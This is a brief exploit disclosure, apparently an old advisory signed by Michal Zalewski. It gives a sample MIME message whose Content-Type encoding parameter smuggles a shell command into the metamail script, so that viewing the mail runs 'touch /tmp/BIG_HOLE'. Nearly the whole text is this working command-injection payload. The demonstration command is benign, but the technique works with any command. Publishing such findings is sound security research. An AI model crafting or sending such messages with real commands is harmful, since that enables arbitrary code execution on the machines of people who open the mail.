Exploit:

  Following MIME mail, when viewed, executes
  'touch /tmp/BIG_HOLE' (bug lies in metamail script):

  **** SAMPLE MIME MESSAGE ****
  MIME-Version: 1.0
  Content-Type: multipart/alternative;
    boundary="----=_NextPart_000_0007_01BD5F09.B6797740"

    ------=_NextPart_000_0007_01BD5F09.B6797740
  Content-Type: default;
    encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE"
  Content-Transfer-Encoding: quoted-printable

  Hellow!!!

  ------=_NextPart_000_0007_01BD5F09.B6797740--
  **** END OF EXAMPLE ****

                     Michal Zalewski [lcamtuf@boss.staszic.waw.pl]